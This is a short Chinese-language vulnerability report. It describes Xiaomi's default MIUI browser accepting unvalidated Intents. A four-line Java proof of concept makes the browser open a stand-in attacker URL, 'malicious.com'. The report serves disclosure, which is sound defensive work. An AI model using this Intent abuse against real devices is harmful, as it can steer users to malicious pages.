关于小米严重漏洞的技术报告
漏洞摘要
在多种 MIUI 设备上的小米默认浏览器(com.android.browser)中发现了一个漏洞。该应用未能正确验证通过 startActivity 传递的 Intent,从而允许恶意应用打开任意 URL 或执行非预期操作。
Intent intent = new Intent();
intent.setComponent(new ComponentName("com.android.browser", "com.android.browser.BrowserActivity"));
intent.setData(Uri.parse("http://malicious.com"));
startActivity(intent);